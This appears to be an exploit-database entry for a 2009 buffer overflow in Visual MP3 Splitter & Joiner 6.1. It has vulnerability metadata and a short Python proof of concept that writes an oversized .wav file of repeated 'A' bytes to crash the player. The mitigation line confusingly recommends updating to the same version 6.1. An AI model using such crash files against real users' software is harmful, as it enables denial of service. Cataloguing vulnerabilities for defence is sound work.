header-logo
Suggest Exploit
vendor:
Visual MP3 Splitter & Joiner
by:
anT!-Tr0J4n
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Visual MP3 Splitter & Joiner
Affected Version From: 6.1
Affected Version To: 6.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:maniac_tools:visual_mp3_splitter_and_joiner
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp3
2009

Visual MP3 Splitter & Joiner 6.1 (.wav) Buffer Overflow Vulnerability

This exploit is a buffer overflow vulnerability in Visual MP3 Splitter & Joiner 6.1. It is triggered when a specially crafted .wav file is opened in the application. The application crashes when the Play button is pressed.

Mitigation:

Update to the latest version of Visual MP3 Splitter & Joiner 6.1.
Source

Exploit-DB raw data:

#Title: Visual MP3 Splitter & Joiner 6.1 (.wav) Buffer Overflow Vulnerability

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil

#special thanks    :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu 

#Home     :   www.Dev-PoinT.com  $ Inj3ct0r.com $ http://milw0rm.ws

#Software :  http://www.ManiacTools.com

#Tested on:   Windows XP sp3

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#!/usr/bin/python
#Home : www.Dev-PoinT.com , Inj3ct0r.com
outfile="crash.wav"
junk="\x41" * 80000
FILE=open(outfile, "w")
FILE.write(junk)
FILE.close()
print ''' File created succesufully , open  it with Visual MP3 Splitter and press the Play button '''